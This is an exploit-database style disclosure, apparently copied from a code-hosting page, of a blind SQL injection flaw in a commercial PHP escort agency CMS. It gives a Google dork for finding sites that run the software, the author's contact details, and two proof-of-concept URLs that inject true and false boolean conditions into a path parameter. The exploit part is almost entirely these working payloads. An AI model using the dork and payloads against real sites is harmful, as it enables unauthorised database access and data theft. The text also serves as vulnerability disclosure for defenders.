19 lines
No EOL
602 B
Text
19 lines
No EOL
602 B
Text
# Exploit Title: Escort Agency CMS Blind SQL Injection Vunerability
|
|
# Google Dork: "Powered by Escort agency CMS - Escort agency webdesign"
|
|
# Platform: php, webapp
|
|
# Date: 10.02.2011
|
|
# Author: NoNameMT
|
|
# Software Link:
|
|
http://www.escortwebsitedesign.co.uk/escort-agency-cms/index.php
|
|
# Price: 299 £ per month
|
|
# Tested on: Windows 7
|
|
# Mail: nonamemt@gmail.com
|
|
# Homepage: http://nonamemt.us
|
|
|
|
# Exploit:
|
|
http://localhost/agency5/Alexa,509+and+1=1--+ //True
|
|
http://localhost/agency5/Alexa,509+and+1=0--+ //False
|
|
|
|
# Greetings:
|
|
4004-security-project.com, J0hn.X3r, TamCore, bursali, theeddy42,
|
|
Nightmare_FH |